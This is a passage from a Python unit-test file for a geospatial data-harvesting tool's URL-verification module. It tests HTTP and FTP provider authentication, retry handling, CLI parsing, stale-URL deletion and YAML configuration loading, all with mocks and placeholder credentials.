return an OAuth2 object usable by `requests`\"\"\"\n with mock.patch('requests_oauthlib.OAuth2Session') as mock_oauth2_session:\n self.assertIsInstance(\n verify_urls.HTTPProvider.build_oauth2('user', 'pass', 'https://foo', 'CLIENT'),\n requests_oauthlib.OAuth2)\n mock_oauth2_session.return_value.fetch_token.assert_called_with(\n token_url='https://foo',\n username='user',\n password='pass',\n client_id='CLIENT'\n )\n\n def test_auth_oauth2(self):\n \"\"\"The auth property should return the right authentication\n object based on the provider attributes\n \"\"\"\n provider = verify_urls.HTTPProvider('test', {\n 'username': 'user',\n 'password': 'pass',\n 'token_url': 'https://foo',\n 'client_id': 'CLIENT'\n })\n\n mock_oauth2 = mock.Mock()\n with mock.patch('geospaas_harvesting.verify_urls.HTTPProvider.build_oauth2',\n return_value=mock_oauth2) as mock_build_oauth2:\n self.assertEqual(\n provider.auth,\n mock_oauth2)\n mock_build_oauth2.assert_called_once_with('user', 'pass', 'https://foo', 'CLIENT')\n\n def test_auth_basic(self):\n \"\"\"The auth property should return the right authentication\n object based on the provider attributes\n \"\"\"\n provider = verify_urls.HTTPProvider('test', {'username': 'user', 'password': 'pass'})\n self.assertEqual(\n provider.auth,\n requests.auth.HTTPBasicAuth('user', 'pass'))\n\n def test_auth_no_auth(self):\n \"\"\"The auth property should return None when no authentication\n method can be determined\n \"\"\"\n provider = verify_urls.HTTPProvider('test', {})\n self.assertIsNone(provider.auth)\n\n def test_auth_renew(self):\n \"\"\"Test that authentication is renewed when necessary\"\"\"\n provider = verify_urls.HTTPProvider('test', {\n 'username': 'user',\n 'password': 'pass',\n 'token_url': 'token',\n 'client_id': 'ID',\n 'auth_renew': 1\n })\n\n with mock.patch('time.monotonic', side_effect=(1, 2, 2.1)), \\\n mock.patch('geospaas_harvesting.verify_urls.HTTPProvider.build_oauth2',\n side_effect=('auth1', 'auth2', 'auth3')):\n # First call -> first return value from build_oauth2()\n self.assertEqual(provider.auth, 'auth1')\n # Second call, one second later -> second return value from build_oauth2()\n self.assertEqual(provider.auth, 'auth2')\n # Third call, less than one second later -> the value does not change\n self.assertEqual(provider.auth, 'auth2')\n\n def test_check_url_200(self):\n \"\"\"Should send a HEAD request to the URL and return whether the\n URL is valid or not.\n \"\"\"\n provider = verify_urls.HTTPProvider('test', {})\n mock_dataset_uri = mock.Mock(id=1, uri='https://foo')\n mock_response = mock.MagicMock(status_code=200, headers={})\n with mock.patch('geospaas_harvesting.utils.http_request', return_value=mock_response):\n self.assertEqual(provider.check_url(mock_dataset_uri), verify_urls.PRESENT)\n\n def test_check_url_404(self):\n \"\"\"Should send a HEAD request to the URL and return\n verify_urls.ABSENT if a 404 error is received\n \"\"\"\n provider = verify_urls.HTTPProvider('test', {})\n mock_dataset_uri = mock.Mock(id=1, uri='https://foo')\n mock_response = mock.MagicMock(status_code=404, headers={})\n with mock.patch('geospaas_harvesting.utils.http_request',\n return_value=mock_response) as mock_request:\n self.assertEqual(provider.check_url(mock_dataset_uri), verify_urls.ABSENT)\n mock_request.assert_called_once()\n\n def test_check_url_http_error(self):\n \"\"\"Should send a HEAD request to the URL and return\n 'http_' if an error code other than 404 is received\n \"\"\"\n provider = verify_urls.HTTPProvider('test', {})\n mock_dataset_uri = mock.Mock(id=1, uri='https://foo')\n mock_response = mock.MagicMock(status_code=503, headers={})\n with mock.patch('geospaas_harvesting.utils.http_request',\n return_value=mock_response) as mock_request:\n self.assertEqual(provider.check_url(mock_dataset_uri), 'http_503')\n mock_request.assert_called_once()\n\n def test_check_url_429_no_header(self):\n \"\"\"When an error 429 occurs, the URL should ne retried after a\n delay\n \"\"\"\n provider = verify_urls.HTTPProvider('test', {})\n mock_dataset_uri = mock.Mock(id=1, uri='https://foo')\n mock_responses = (\n mock.MagicMock(status_code=429, headers={}),\n mock.MagicMock(status_code=404, headers={})\n )\n with mock.patch('geospaas_harvesting.utils.http_request',\n side_effect=mock_responses) as mock_request, \\\n mock.patch('time.sleep') as mock_sleep:\n\n with self.assertLogs(verify_urls.logger, level=logging.WARNING):\n self.assertEqual(provider.check_url(mock_dataset_uri),verify_urls.ABSENT)\n\n self.assertEqual(mock_request.call_count, 2)\n self.assertListEqual(mock_sleep.call_args_list, [mock.call(60), mock.call(0)])\n\n def test_check_url_429_retry_after_header(self):\n \"\"\"When an error 429 occurs, the URL should be retried after a\n delay\n \"\"\"\n provider = verify_urls.HTTPProvider('test', {'throttle': 1})\n mock_dataset_uri = mock.Mock(id=1, uri='https://foo')\n mock_responses = (\n mock.MagicMock(status_code=429, headers={'Retry-After': 2}),\n mock.MagicMock(status_code=200, headers={})\n )\n with mock.patch('geospaas_harvesting.utils.http_request',\n side_effect=mock_responses) as mock_request, \\\n mock.patch('time.sleep') as mock_sleep:\n\n with self.assertLogs(verify_urls.logger, level=logging.WARNING):\n self.assertEqual(\n provider.check_url(mock_dataset_uri),\n verify_urls.PRESENT)\n\n self.assertEqual(mock_request.call_count, 2)\n self.assertListEqual(mock_sleep.call_args_list, [mock.call(2), mock.call(1)])\n\n def test_check_url_429_too_many_retries(self):\n \"\"\"When there are too many retries, an exception should be\n raised\n \"\"\"\n provider = verify_urls.HTTPProvider('test', {})\n mock_dataset_uri = mock.Mock(id=1, uri='https://foo')\n mock_responses = (\n mock.MagicMock(status_code=429, headers={}),\n mock.MagicMock(status_code=200, headers={})\n )\n with mock.patch('geospaas_harvesting.utils.http_request',\n side_effect=mock_responses) as mock_request:\n\n with self.assertRaises(verify_urls.TooManyRequests):\n provider.check_url(mock_dataset_uri, tries=1)\n mock_request.assert_called_once()\n\n def test_check_url_connection_error_retry(self):\n \"\"\"The request should be retried if a ConnectionError occurs\"\"\"\n provider = verify_urls.HTTPProvider('test', {})\n mock_dataset_uri = mock.Mock(id=1, uri='https://foo')\n with mock.patch('geospaas_harvesting.utils.http_request') as mock_request, \\\n mock.patch('time.sleep') as mock_sleep:\n mock_request.side_effect = (\n requests.exceptions.ConnectionError,\n requests.exceptions.ConnectionError,\n mock.MagicMock(status_code=200, headers={})\n )\n with self.assertLogs(verify_urls.logger, level=logging.ERROR):\n provider.check_url(mock_dataset_uri, tries=5)\n\n self.assertListEqual(mock_sleep.call_args_list, [mock.call(5), mock.call(5), mock.call(0)])\n\n def test_check_url_connection_error_too_many_retries(self):\n \"\"\"The request should be retried if a ConnectionError occurs\n and the exception should be raised if the retry limit is\n reached\n \"\"\"\n provider = verify_urls.HTTPProvider('test', {})\n mock_dataset_uri = mock.Mock(id=1, uri='https://foo')\n with mock.patch('geospaas_harvesting.utils.http_request') as mock_request, \\\n mock.patch('time.sleep') as mock_sleep:\n mock_request.side_effect = (\n requests.exceptions.ConnectionError,\n requests.exceptions.ConnectionError,\n )\n with self.assertLogs(verify_urls.logger, level=logging.ERROR), \\\n self.assertRaises(requests.exceptions.ConnectionError):\n provider.check_url(mock_dataset_uri, tries=2)\n\n self.assertListEqual(mock_sleep.call_args_list, [mock.call(5)])\n\n def test_check_and_write_stale_url_valid(self):\n \"\"\"Should not write anything to the output file if the URL is\n valid\n \"\"\"\n provider = verify_urls.HTTPProvider('test', {})\n mock_lock = mock.MagicMock()\n with mock.patch('geospaas_harvesting.verify_urls.HTTPProvider.check_url',\n return_value=verify_urls.PRESENT), \\\n mock.patch('geospaas_harvesting.verify_urls.open') as mock_open:\n provider.check_and_write_stale_url(mock_lock, 'output.txt', mock.Mock())\n mock_open.assert_not_called()\n\n def test_check_and_write_stale_url_invalid(self):\n \"\"\"Should write the URL info to the output file if the URL is\n invalid\n \"\"\"\n provider = verify_urls.HTTPProvider('test', {})\n with mock.patch('geospaas_harvesting.verify_urls.HTTPProvider.check_url',\n return_value=verify_urls.ABSENT), \\\n mock.patch('geospaas_harvesting.verify_urls.open') as mock_open:\n mock_file = mock.MagicMock()\n mock_open.return_value.__enter__.return_value = mock_file\n mock_dataset_uri = mock.Mock()\n mock_dataset_uri.id = 1\n mock_dataset_uri.uri = 'https://foo'\n provider.check_and_write_stale_url(mock.MagicMock(), 'output.txt', mock_dataset_uri)\n mock_file.write.assert_called_once_with(\n f\"{verify_urls.ABSENT} 1 https://foo{os.linesep}\")\n\n def test_check_all_urls(self):\n \"\"\"Should check all the URLs for one provider\"\"\"\n mock_lock = mock.Mock()\n with mock.patch('geospaas_harvesting.verify_urls.Lock', return_value=mock_lock), \\\n mock.patch(\n 'geospaas_harvesting.verify_urls.BoundedThreadPoolExecutor') as mock_pool, \\\n mock.patch('geospaas_harvesting.verify_urls.DatasetURI.objects') as mock_manager, \\\n mock.patch('concurrent.futures.as_completed'), \\\n mock.patch('geospaas_harvesting.verify_urls.HTTPProvider'\n '.check_and_write_stale_url') as mock_write:\n mock_executor = mock_pool.return_value.__enter__.return_value\n mock_dataset_uri = mock.Mock()\n mock_manager.filter.return_value.iterator.return_value = [mock_dataset_uri]\n\n # call without throttle: 50 workers\n provider = verify_urls.HTTPProvider('test', {'url': 'https://foo/'})\n with self.assertLogs(verify_urls.logger, level=logging.INFO):\n provider.check_all_urls('output.txt')\n\n mock_executor.submit.assert_called_once_with(\n mock_write, mock_lock, 'output.txt', mock_dataset_uri)\n mock_pool.assert_called_once_with(max_workers=50, queue_limit=2000)\n\n mock_pool.reset_mock()\n\n # call with throttle: 1 worker\n provider = verify_urls.HTTPProvider('test', {'url': 'https://foo/', 'throttle': 1})\n with self.assertLogs(verify_urls.logger, level=logging.INFO):\n provider.check_all_urls('output.txt')\n mock_executor.submit.assert_called_once_with(\n mock_write, mock_lock, 'output.txt', mock_dataset_uri)\n mock_pool.assert_called_once_with(max_workers=1, queue_limit=2000)\n\n mock_pool.reset_mock()\n\n def test_check_all_urls_thread_error(self):\n \"\"\"Exceptions happening in the threads should be raised in the\n main thread\n \"\"\"\n provider = verify_urls.HTTPProvider('test', {'url': 'https://foo'})\n with mock.patch('geospaas_harvesting.verify_urls.HTTPProvider'\n '.check_and_write_stale_url') as mock_write, \\\n mock.patch('geospaas_harvesting.verify_urls.DatasetURI.objects') as mock_manager:\n mock_write.side_effect = ValueError\n mock_manager.filter.return_value.iterator.return_value = [mock.Mock()]\n with self.assertRaises(ValueError), \\\n self.assertLogs(verify_urls.logger, level=logging.INFO):\n provider.check_all_urls('out.txt')\n\n\nclass FTPProviderTestCase(unittest.TestCase):\n \"\"\"Test the FTPProvider class\"\"\"\n\n def test_instantiation(self):\n \"\"\"Test that the attributes are correctly initialized\"\"\"\n provider = verify_urls.FTPProvider('test', {'foo': 'bar'})\n self.assertEqual(provider.name, 'test')\n self.assertEqual(provider.config, {'foo': 'bar'})\n self.assertEqual(provider._ftp_client, None)\n\n def test_auth(self):\n \"\"\"Test that the auth property returns a dictionary of\n arguments for ftplib.FTP.login() if the necessary information\n is provided\n \"\"\"\n # No authentication\n provider = verify_urls.FTPProvider('test', {})\n self.assertEqual(provider.auth, {'user': '', 'passwd': ''})\n\n # Authentication info provided\n provider = verify_urls.FTPProvider('test', {'username': 'user', 'password': 'pass'})\n provider_auth = provider.auth\n self.assertEqual(provider_auth, {'user': 'user', 'passwd': 'pass'})\n\n # Return existing auth\n self.assertIs(provider.auth, provider_auth)\n\n def test_ftp_client(self):\n \"\"\"Test that an FTP client is provided by the ftp_client property\"\"\"\n provider = verify_urls.FTPProvider('test', {})\n with mock.patch.object(provider, 'ftp_connect') as mock_ftp_connect:\n ftp_client = provider.ftp_client\n self.assertIsInstance(provider.ftp_client, ftplib.FTP)\n mock_ftp_connect.assert_called_once()\n\n mock_ftp_connect.reset_mock()\n\n # Check that the client is re-used on following calls\n self.assertIs(provider.ftp_client, ftp_client)\n mock_ftp_connect.assert_not_called()\n\n def test_ftp_connect(self):\n \"\"\"Test FTP connection in a standard case\"\"\"\n provider = verify_urls.FTPProvider('test', {'url': 'ftp://foo'})\n with mock.patch('geospaas_harvesting.verify_urls.FTPProvider.ftp_client',\n new_callable=mock.PropertyMock) as mock_ftp_client:\n provider.ftp_connect()\n mock_ftp_client.return_value.connect.assert_called_with('foo', timeout=5)\n mock_ftp_client.return_value.login.assert_called_with(user='', passwd='')\n\n def test_ftp_connect_with_auth(self):\n \"\"\"Test FTP connection with authentication\"\"\"\n provider = verify_urls.FTPProvider('test', {\n 'url': 'ftp://foo',\n 'username': 'user',\n 'password': 'pass'\n })\n with mock.patch('geospaas_harvesting.verify_urls.FTPProvider.ftp_client',\n new_callable=mock.PropertyMock) as mock_ftp_client:\n provider.ftp_connect()\n mock_ftp_client.return_value.connect.assert_called_with('foo', timeout=5)\n mock_ftp_client.return_value.login.assert_called_with(user='user', passwd='pass')\n\n def test_ftp_connect_ok_after_retry(self):\n \"\"\"Test FTP connection with retries, successful in the end\"\"\"\n provider = verify_urls.FTPProvider('test', {'url': 'ftp://foo'})\n with mock.patch('geospaas_harvesting.verify_urls.FTPProvider.ftp_client',\n new_callable=mock.PropertyMock) as mock_ftp_client, \\\n mock.patch('time.sleep') as mock_sleep:\n mock_ftp_client.return_value.connect.side_effect = (socket.timeout(),) * 3 + ('220',)\n\n provider.ftp_connect()\n\n mock_ftp_client.return_value.connect.assert_called_with('foo', timeout=5)\n self.assertEqual(mock_ftp_client.return_value.connect.call_count, 4)\n\n mock_ftp_client.return_value.login.assert_called_once_with(user='', passwd='')\n\n self.assertListEqual(\n mock_sleep.call_args_list,\n [mock.call(5), mock.call(6), mock.call(7)])\n\n def test_ftp_connect_failing_after_retry(self):\n \"\"\"Test FTP connection with retries, failing in the end\"\"\"\n provider = verify_urls.FTPProvider('test', {'url': 'ftp://foo'})\n with mock.patch('geospaas_harvesting.verify_urls.FTPProvider.ftp_client',\n new_callable=mock.PropertyMock) as mock_ftp_client, \\\n mock.patch('time.sleep') as mock_sleep:\n mock_ftp_client.return_value.connect.side_effect = socket.timeout\n\n with self.assertRaises(socket.timeout), \\\n self.assertLogs(verify_urls.logger, level=logging.ERROR):\n provider.ftp_connect()\n\n self.assertEqual(mock_ftp_client.return_value.connect.call_count, 5)\n mock_ftp_client.return_value.login.assert_not_called()\n self.assertListEqual(\n mock_sleep.call_args_list,\n [mock.call(5), mock.call(6), mock.call(7), mock.call(8)])\n\n def test_check_url_present(self):\n \"\"\"Test checking a URL that points to an existing file\"\"\"\n mock_dataset_uri = mock.Mock()\n mock_dataset_uri.uri = 'ftp://foo/bar/baz.nc'\n with mock.patch('geospaas_harvesting.verify_urls.FTPProvider.ftp_client',\n new_callable=mock.PropertyMock) as mock_ftp_client:\n\n mock_ftp_client.return_value.nlst.return_value = ['/bar/baz.nc']\n provider = verify_urls.FTPProvider('test', {'url': 'ftp://foo'})\n\n self.assertEqual(\n provider.check_url(mock_dataset_uri),\n verify_urls.PRESENT)\n\n def test_check_url_absent(self):\n \"\"\"Test checking a URL that points to an non-existing file\"\"\"\n mock_dataset_uri = mock.Mock()\n mock_dataset_uri.uri = 'ftp://foo/bar/baz.nc'\n with mock.patch('geospaas_harvesting.verify_urls.FTPProvider.ftp_client',\n new_callable=mock.PropertyMock) as mock_ftp_client:\n\n mock_ftp_client.return_value.nlst.return_value = []\n provider = verify_urls.FTPProvider('test', {'url': 'ftp://foo'})\n\n self.assertEqual(\n provider.check_url(mock_dataset_uri),\n verify_urls.ABSENT)\n\n def test_check_url_ok_after_retries(self):\n \"\"\"Test checking a URL successfully after some retries\"\"\"\n mock_dataset_uri = mock.Mock()\n mock_dataset_uri.uri = 'ftp://foo/bar/baz.nc'\n with mock.patch('geospaas_harvesting.verify_urls.FTPProvider.ftp_client',\n new_callable=mock.PropertyMock) as mock_ftp_client, \\\n mock.patch('time.sleep') as mock_sleep:\n\n mock_ftp_client.return_value.nlst.side_effect = (\n (ConnectionResetError,) * 3 + (verify_urls.ABSENT,))\n provider = verify_urls.FTPProvider('test', {'url': 'ftp://foo'})\n\n self.assertEqual(\n provider.check_url(mock_dataset_uri),\n verify_urls.ABSENT)\n\n self.assertEqual(mock_ftp_client.return_value.nlst.call_count, 4)\n self.assertEqual(mock_ftp_client.return_value.connect.call_count, 3)\n self.assertEqual(mock_sleep.call_count, 3)\n\n def test_check_url_failing_after_retries(self):\n \"\"\"Test when checking a URL fails after retries\"\"\"\n mock_dataset_uri = mock.Mock()\n mock_dataset_uri.uri = 'ftp://foo/bar/baz.nc'\n with mock.patch('geospaas_harvesting.verify_urls.FTPProvider.ftp_client',\n new_callable=mock.PropertyMock) as mock_ftp_client, \\\n mock.patch('time.sleep') as mock_sleep:\n\n mock_ftp_client.return_value.nlst.side_effect = ConnectionResetError\n provider = verify_urls.FTPProvider('test', {'url': 'ftp://foo'})\n\n with self.assertRaises(ConnectionResetError), \\\n self.assertLogs(verify_urls.logger, level=logging.ERROR):\n provider.check_url(mock_dataset_uri)\n\n self.assertEqual(mock_ftp_client.return_value.nlst.call_count, 5)\n self.assertEqual(mock_ftp_client.return_value.connect.call_count, 4)\n self.assertEqual(mock_sleep.call_count, 4)\n\n def test_check_all_urls(self):\n \"\"\"Test that the right URLs are written to the output file\"\"\"\n provider = verify_urls.FTPProvider('test', {'url': 'ftp://foo'})\n with mock.patch('geospaas_harvesting.verify_urls.DatasetURI.objects') as mock_manager, \\\n mock.patch.object(provider, 'check_url') as mock_check_url, \\\n mock.patch.object(provider, 'write_stale_url') as mock_write:\n\n mock_manager.filter.return_value.iterator.return_value = iter([\n mock.Mock(id=1, uri='ftp://foo/bar/baz1.nc'),\n mock.Mock(id=2, uri='ftp://foo/bar/baz2.nc'),\n mock.Mock(id=3, uri='ftp://foo/bar/baz3.nc'),\n ])\n\n mock_check_url.side_effect = (verify_urls.ABSENT, verify_urls.PRESENT, 'http_503')\n\n with self.assertLogs(verify_urls.logger):\n provider.check_all_urls('output.txt')\n\n self.assertListEqual(mock_write.call_args_list, [\n mock.call('output.txt', verify_urls.ABSENT, 1, 'ftp://foo/bar/baz1.nc'),\n mock.call('output.txt', 'http_503', 3, 'ftp://foo/bar/baz3.nc'),\n ])\n\n\nclass VerifyURLsTestCase(unittest.TestCase):\n \"\"\"Test the URLs verification module\"\"\"\n\n def test_main_check(self):\n \"\"\"The correct actions should be launched depending on the CLI\n arguments\n \"\"\"\n args = mock.Mock()\n args.action = 'check'\n with mock.patch('geospaas_harvesting.verify_urls.parse_cli_arguments', return_value=args), \\\n mock.patch('geospaas_harvesting.verify_urls.read_config'), \\\n mock.patch('geospaas_harvesting.verify_urls.check_providers') as mock_check, \\\n mock.patch('geospaas_harvesting.verify_urls.delete_stale_urls') as mock_delete:\n\n with self.assertLogs(verify_urls.logger):\n verify_urls.main()\n mock_check.assert_called_once()\n mock_delete.assert_not_called()\n\n def test_main_delete(self):\n \"\"\"Test that the delete_stale_urls() function is called when\n the 'delete-stale' argument is given on the CLI\n \"\"\"\n args = mock.Mock()\n args.action = 'delete-stale'\n with mock.patch('geospaas_harvesting.verify_urls.parse_cli_arguments', return_value=args), \\\n mock.patch('geospaas_harvesting.verify_urls.read_config'), \\\n mock.patch('geospaas_harvesting.verify_urls.check_providers') as mock_check, \\\n mock.patch('geospaas_harvesting.verify_urls.delete_stale_urls') as mock_delete:\n\n with self.assertLogs(verify_urls.logger):\n verify_urls.main()\n mock_check.assert_not_called()\n mock_delete.assert_called_once()\n\n def test_parse_cli_arguments_check(self):\n \"\"\"Test CLI arguments parsing for the check action\"\"\"\n with mock.patch('sys.argv',\n ['verify_urls.py', '-p', '/foo.yml', 'check', '-o', '/bar']):\n self.assertEqual(\n verify_urls.parse_cli_arguments(),\n argparse.Namespace(\n providers_conf='/foo.yml', action='check', output_directory='/bar'))\n\n def test_parse_cli_arguments_check_defaults(self):\n \"\"\"Test CLI arguments parsing for the check action with default\n values\n \"\"\"\n default_provider_conf = os.path.join(os.path.dirname(verify_urls.__file__), 'check.yml')\n with mock.patch('sys.argv', ['verify_urls.py', 'check']):\n self.assertEqual(\n verify_urls.parse_cli_arguments(),\n argparse.Namespace(\n providers_conf=default_provider_conf, action='check', output_directory='.'))\n\n def test_parse_cli_arguments_delete(self):\n \"\"\"Test CLI arguments parsing for the delete action\"\"\"\n with mock.patch('sys.argv',\n ['verify_urls.py', '-p', '/foo.yml', 'delete-stale', '/bar/baz.txt']):\n self.assertEqual(\n verify_urls.parse_cli_arguments(),\n argparse.Namespace(\n providers_conf='/foo.yml',\n action='delete-stale',\n urls_file='/bar/baz.txt',\n force=False))\n\n def test_parse_cli_arguments_delete_force(self):\n \"\"\"Test CLI arguments parsing for the delete action with the force option\"\"\"\n with mock.patch('sys.argv',\n ['verify_urls.py', '-p', '/foo.yml', 'delete-stale', '/bar/baz.txt', '-f']):\n self.assertEqual(\n verify_urls.parse_cli_arguments(),\n argparse.Namespace(\n providers_conf='/foo.yml',\n action='delete-stale',\n urls_file='/bar/baz.txt',\n force=True))\n\n def test_parse_cli_arguments_no_action(self):\n \"\"\"An error should be raised if no action is specified in the\n CLI arguments\n \"\"\"\n buffer = io.StringIO()\n with mock.patch('sys.argv', ['verify_urls.py']), \\\n mock.patch('sys.stderr', buffer), \\\n self.assertRaises(SystemExit):\n verify_urls.parse_cli_arguments()\n self.assertIn(\n 'the following arguments are required: action',\n buffer.getvalue())\n\n def test_parse_cli_arguments_check_wrong_arg(self):\n \"\"\"An error should be raised if the wrong argument is provided\n to the check action\n \"\"\"\n buffer = io.StringIO()\n with mock.patch('sys.argv', ['verify_urls.py', 'check', '-f']), \\\n mock.patch('sys.stderr', buffer), \\\n self.assertRaises(SystemExit):\n verify_urls.parse_cli_arguments()\n self.assertIn('unrecognized arguments: -f', buffer.getvalue())\n\n def test_parse_cli_arguments_delete_wrong_arg(self):\n \"\"\"An error should be raised if the wrong argument is provided\n to the delete action\n \"\"\"\n buffer = io.StringIO()\n with mock.patch('sys.argv', ['verify_urls.py', 'delete-stale', '-o', '/bar']), \\\n mock.patch('sys.stderr', buffer), \\\n self.assertRaises(SystemExit):\n verify_urls.parse_cli_arguments()\n self.assertIn('unrecognized arguments: -o', buffer.getvalue())\n\n def test_delete_stale_urls(self):\n \"\"\"404 URLs should be deleted unless the force option is used\n \"\"\"\n provider = verify_urls.HTTPProvider('test', {\n 'url': 'https://foo',\n 'username': 'username',\n 'password': 'password',\n 'auth_renew': -1\n })\n file_contents = f'{verify_urls.ABSENT} 12 https://foo/bar\\nhttp_500 13 https://foo/baz'\n check_url_results = (verify_urls.ABSENT, 'http_500')\n\n dataset_uris = {12: 'https://foo/bar', 13: 'https://foo/baz'}\n mock_manager = mock.Mock()\n mock_manager.filter.side_effect = lambda id: [mock.Mock(uri=dataset_uris.get(id))]\n\n with mock.patch('geospaas_harvesting.verify_urls.find_provider', return_value=provider), \\\n mock.patch('geospaas_harvesting.verify_urls.DatasetURI.objects', mock_manager):\n\n # force == False, only the URL that returns 404 must be\n # deleted\n buffer = io.StringIO(file_contents)\n with mock.patch('geospaas_harvesting.verify_urls.open', return_value=buffer), \\\n mock.patch('geospaas_harvesting.verify_urls.HTTPProvider.check_url',\n side_effect=check_url_results), \\\n mock.patch('geospaas_harvesting.verify_urls.remove_dataset_uri',\n return_value=(True, True)) as mock_remove:\n self.assertEqual(verify_urls.delete_stale_urls('', {}, force=False), (1, 1))\n self.assertListEqual(\n [args[0][0].uri for args in mock_remove.call_args_list],\n ['https://foo/bar'])\n\n # force == True, both URLs must be deleted\n buffer = io.StringIO(file_contents)\n with mock.patch('geospaas_harvesting.verify_urls.open', return_value=buffer), \\\n mock.patch('geospaas_harvesting.verify_urls.HTTPProvider.check_url',\n side_effect=check_url_results), \\\n mock.patch('geospaas_harvesting.verify_urls.remove_dataset_uri',\n return_value=(True, True)) as mock_remove:\n self.assertEqual(verify_urls.delete_stale_urls('', {}, force=True), (2, 2))\n self.assertListEqual(\n [args[0][0].uri for args in mock_remove.call_args_list],\n ['https://foo/bar', 'https://foo/baz'])\n\n # The URI does not exist\n buffer = io.StringIO(file_contents)\n with mock.patch('geospaas_harvesting.verify_urls.open', return_value=buffer):\n mock_manager.filter.side_effect = None\n mock_manager.filter.return_value = []\n with self.assertLogs(verify_urls.logger, level=logging.WARNING):\n self.assertEqual(verify_urls.delete_stale_urls('', {}, force=False), (0, 0))\n\n def test_remove_dataset_uri_and_dataset(self):\n \"\"\"The URI should be removed, as well as the corresponding\n dataset if it does not have anymore URIs\n \"\"\"\n dataset_uri = mock.Mock()\n dataset_uri.delete.return_value = (1, {'catalog.DatasetURI': 1})\n dataset_uri.dataset.delete.return_value = (1, {'catalog.Dataset': 1})\n\n # simulate empty queryset\n dataset_uri.dataset.dataseturi_set.all.return_value = []\n self.assertTupleEqual(verify_urls.remove_dataset_uri(dataset_uri), (True, True))\n dataset_uri.delete.assert_called_once_with()\n dataset_uri.dataset.delete.assert_called_once_with()\n\n def test_remove_dataset_uri_but_not_dataset(self):\n \"\"\"The URI should be removed, but not the corresponding\n dataset if it has more URIs\n \"\"\"\n dataset_uri = mock.Mock()\n dataset_uri.delete.return_value = (1, {'catalog.DatasetURI': 1})\n\n # simulate queryset with one element\n dataset_uri.dataset.dataseturi_set.all.return_value = [mock.Mock()]\n self.assertTupleEqual(verify_urls.remove_dataset_uri(dataset_uri), (True, False))\n dataset_uri.delete.assert_called_once_with()\n dataset_uri.dataset.delete.assert_not_called()\n\n def test_dataset_uri_and_dataset_not_removed(self):\n \"\"\"If the URI and/or dataset are not removed,\n remove_dataset_uri() should return booleans indicating so.\n This should not usually happen.\n \"\"\"\n dataset_uri = mock.Mock()\n dataset_uri.delete.return_value = (0, {'catalog.DatasetURI': 0})\n dataset_uri.dataset.delete.return_value = (0, {'catalog.Dataset': 0})\n\n # simulate empty queryset\n dataset_uri.dataset.dataseturi_set.all.return_value = []\n self.assertTupleEqual(verify_urls.remove_dataset_uri(dataset_uri), (False, False))\n dataset_uri.delete.assert_called_once_with()\n dataset_uri.dataset.delete.assert_called_once_with()\n\n def test_find_provider(self):\n \"\"\"Should return the right provider given a URL\"\"\"\n scihub_provider = verify_urls.HTTPProvider('scihub', {\n 'url': 'https://scihub.copernicus.eu/',\n 'username': 'scihub_user',\n 'password': 'scihub_pass',\n 'throttle': 0\n })\n podaac_provider = verify_urls.HTTPProvider('podaac', {\n 'url': 'https://opendap.jpl.nasa.gov/opendap/',\n 'username': 'podaac_user',\n 'password': 'podaac_pass',\n 'throttle': 0\n })\n providers = [scihub_provider, podaac_provider]\n\n self.assertIsNone(verify_urls.find_provider('foo.txt', providers))\n self.assertEqual(\n verify_urls.find_provider('scihub_stale_urls_2021-05-25T10:22:27.txt', providers),\n scihub_provider)\n self.assertEqual(\n verify_urls.find_provider('podaac_stale_urls_2021-05-25T10:22:28.txt', providers),\n podaac_provider)\n\n def test_check_providers(self):\n \"\"\"Should run URL checks for each provider in a separate\n process. If an exception is raised in one of the sub-processes,\n check_providers() should return False and the traceback of the\n exception should be logged\n \"\"\"\n providers = [\n verify_urls.HTTPProvider('scihub', {\n 'url': 'https://scihub.copernicus.eu/',\n 'username': 'scihub_user',\n 'password': 'scihub_pass',\n 'throttle': 0\n }),\n verify_urls.HTTPProvider('podaac', {\n 'url': 'https://opendap.jpl.nasa.gov/opendap/',\n 'username': 'podaac_user',\n 'password': 'podaac_pass',\n 'throttle': 0\n }),\n verify_urls.FTPProvider('rtofs', {\n 'url': 'ftp://ftpprd.ncep.noaa.gov/pub/data/nccf/com/rtofs/prod/'\n }),\n ]\n\n with mock.patch('concurrent.futures.ProcessPoolExecutor') as mock_pool, \\\n mock.patch('geospaas_harvesting.verify_urls.datetime') as mock_datetime, \\\n mock.patch('geospaas_harvesting.verify_urls.'\n 'HTTPProvider.check_all_urls') as mock_http_check, \\\n mock.patch('geospaas_harvesting.verify_urls.'\n 'FTPProvider.check_all_urls') as mock_ftp_check, \\\n mock.patch('concurrent.futures.as_completed', iter):\n mock_executor = mock_pool.return_value.__enter__.return_value\n mock_datetime.now.return_value.strftime.return_value = 'time'\n self.assertTrue(verify_urls.check_providers('foo', providers))\n mock_executor.submit.assert_has_calls((\n mock.call(\n mock_http_check,\n os.path.join('foo', 'scihub_stale_urls_time.txt')),\n mock.call(\n mock_http_check,\n os.path.join('foo', 'podaac_stale_urls_time.txt')),\n mock.call(\n mock_ftp_check,\n os.path.join('foo', 'rtofs_stale_urls_time.txt'))\n ), any_order=True)\n self.assertEqual(len(mock_executor.submit.call_args_list), 3)\n\n mock_executor.submit.return_value.result.side_effect = AttributeError\n with self.assertLogs(verify_urls.logger, level=logging.ERROR):\n self.assertFalse(verify_urls.check_providers('foo', providers))\n\n\n def test_read_config(self):\n \"\"\"Should read the provider configuration from a YAML file\"\"\"\n config = textwrap.dedent('''---\n podaac:\n url: 'https://opendap.jpl.nasa.gov/opendap/'\n scihub:\n url: 'https://scihub.copernicus.eu/'\n username: !ENV 'COPERNICUS_OPEN_HUB_USERNAME'\n password: !ENV 'COPERNICUS_OPEN_HUB_PASSWORD'\n creodias:\n url: 'https://zipper.creodias.eu/'\n username: !ENV 'CREODIAS_USERNAME'\n password: !ENV 'CREODIAS_PASSWORD'\n token_url: 'https://auth.creodias.eu/auth/realms/DIAS/protocol/openid-connect/token'\n client_id: 'CLOUDFERRO_PUBLIC'\n throttle: 1\n auth_renew: 36000\n rtofs:\n url: 'ftp://ftpprd.ncep.noaa.gov/pub/data/nccf/com/rtofs/prod/'\n ''')\n environment = {\n 'COPERNICUS_OPEN_HUB_USERNAME': 'copernicus_user',\n 'COPERNICUS_OPEN_HUB_PASSWORD': 'copernicus_password',\n 'CREODIAS_USERNAME': 'creodias_user',\n 'CREODIAS_PASSWORD': 'creodias_password',\n }\n # we check that get_auth() is called with the right arguments\n # by replacing its output by its arguments\n with mock.patch('geospaas_harvesting.verify_urls.open', mock.mock_open(read_data=config)), \\\n mock.patch('os.environ', environment):\n providers = verify_urls.read_config('foo.yml')\n\n self.assertListEqual(providers, [\n verify_urls.HTTPProvider('podaac', {\n 